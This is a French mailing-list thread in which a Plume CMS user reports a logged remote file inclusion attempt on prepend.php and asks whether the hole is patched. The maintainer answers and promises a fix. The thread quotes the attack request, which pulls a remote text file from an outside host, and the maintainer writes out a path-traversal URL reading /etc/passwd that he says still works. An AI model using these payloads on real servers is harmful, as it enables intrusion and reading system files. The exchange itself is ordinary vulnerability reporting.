Faille de sécurité PREPEND corrigée ?
Gemini
après avoir consulté attentivement les traces de mon serveur web, j’ai
constaté des activités assez louche sur mon blog. Recherches faites, il
semblerait que celles-ci se basent sur la faille suivante :
http://hack0wn.com/view.php?xroot=1123.0&cat=exploits
Un exemple :
81.176.226.180 www.monsite.org - [02/Jan/2011:08:48:49 +0100]
"GET /rss.php/manager/frontinc/prepend.php?_PX_config[manager_path]=http://mall.yjecrc.or.kr//bbs/Uploads/im\
g00.txt???? HTTP/1.1" 200 10602 "-" "Mozilla/5.0"
Le fait qu’il y ai eu une réponses 200 m’inquiète.
A-t-elle été corrigée ( il semblerait que non puisque le lien cité
parle de la version 1.2.4 de Plume CMS), et si ce n’est pas le cas,
serait-il possible d’avoir une version 1.2.5 corrigeant cette faille ?
Après quelques recherches dans les archives de cette liste, je suis
tombé sur des messages datant de 2006 qui abordaient ce problème ; les
modifications à faire ne semblaient pas lourdes et il était question
d’installer la version 1.1 qui était plus sécurisée. Du coup, je suis
un peu confus sur l’état réel à ce jour de cette faille.
Merci d’avance pour vos précisions et excellent soirée !
Gemini
Loic d'Anterroches
effectivement, sur les 3 exemples un cas de faille existe toujours:
http://127.0.0.1/plume/manager/tools.php?p=../../../../../../etc/passwd%00
Le cas de tes logs ne va rien donner. C'est corrigé depuis longtemps. Je
fais un fix et mets en ligne une nouvelle version dans la soirée.
loïc